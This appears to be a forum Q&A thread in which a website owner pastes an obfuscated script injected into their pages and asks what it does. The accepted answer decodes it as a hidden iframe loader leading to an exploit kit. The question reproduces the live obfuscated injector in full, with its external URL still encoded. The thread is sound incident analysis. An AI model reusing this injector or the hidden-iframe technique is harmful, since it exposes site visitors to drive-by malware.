# "Black Hole Exploit" notice from AVG for a web site

Tags: javascript, virus

I have a website I run for a relation and their AVG came up saying "EXPLOIT BLACK HOLE EXPLOIT" or something like that. This seems to happen when the website is infected, and I think it is infected. I found this line of code on all the pages, and I didn't put it there: http://pastebin.com/sJXgw8LX (yes that is all one line).

```
<body><!--398c3d--><script>b=new function(){return 2;};if(!+b)String.prototype.test='harC';for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e']('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+39,-x+121,-x+7,-x+7,-x+7,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+57,-x+7,-x+7,-x+123,-x+30,-x+99,-x+106,-x+113,-x+99,-x+30,-x+121,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+117,-x+112,-x+103,-x+114,-x+99,-x+38,-x+32,-x+58,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+30,-x+113,-x+112,-x+97,-x+59,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+30,-x+117,-x+103,-x+98,-x+114,-x+102,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+113,-x+114,-x+119,-x+106,-x+99,-x+59,-x+37,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+56,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+57,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+56,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+57,-x+106,-x+99,-x+100,-x+114,-x+56,-x+46,-x+57,-x+114,-x+109,-x+110,-x+56,-x+46,-x+57,-x+37,-x+60,-x+58,-x+45,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+60,-x+32,-x+39,-x+57,-x+7,-x+7,-x+123,-x+7,-x+7,-x+100,-x+115,-x+108,-x+97,-x+114,-x+103,-x+109,-x+108,-x+30,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+121,-x+7,-x+7,-x+7,-x+116,-x+95,-x+112,-x+30,-x+100,-x+30,-x+59,-x+30,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+97,-x+112,-x+99,-x+95,-x+114,-x+99,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+38,-x+37,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+113,-x+112,-x+97,-x+37,-x+42,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+59,-x+37,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+59,-x+37,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+106,-x+99,-x+100,-x+114,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+114,-x+109,-x+110,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+117,-x+103,-x+98,-x+114,-x+102,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);</script><!--/398c3d-->
```

What does that code do?

Comment: http://research.zscaler.com/2011/02/blackhole-exploits-kit-attack-growing.html

Comment: Thanks to both of you, my question is answered now.

Comment: @Paul We have a lot of other stack-exchange sites this might have had a better chance on, you should check them out and familiarize yourself.

Comment: @Mat: Post that as an answer - it's clear and answers the question nicely.

Comment: @Nightfirecat: It's not an answer, and Mat posted it exactly right (as a comment). Links to external sites alone are not answers; if the external site goes down or disappears, the answer becomes invalid. Answers should stand on their own so that they remain usable; if an external link then adds more information, that's perfectly fine. Nice job, Mat. :)

Comment: @Fabio Post that as an answer!

Comment: @KenWhite: I'm aware, but that tends to be why you add the important part of the context to the answer, not _only_ a link to the website.

Answer (score 3, accepted):

Here is the evaluated javascript:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://xxxxxxx/sutra/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://xxxxx/sutra/in.cgi?default');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

I've obfuscated the actual hostname, to prevent further damages. In that page there is another semi obfuscated javascript which redirect your browser to another page on the same host which presumably force the visitor browser to download something. I did not continued to follow the code to the final destination.l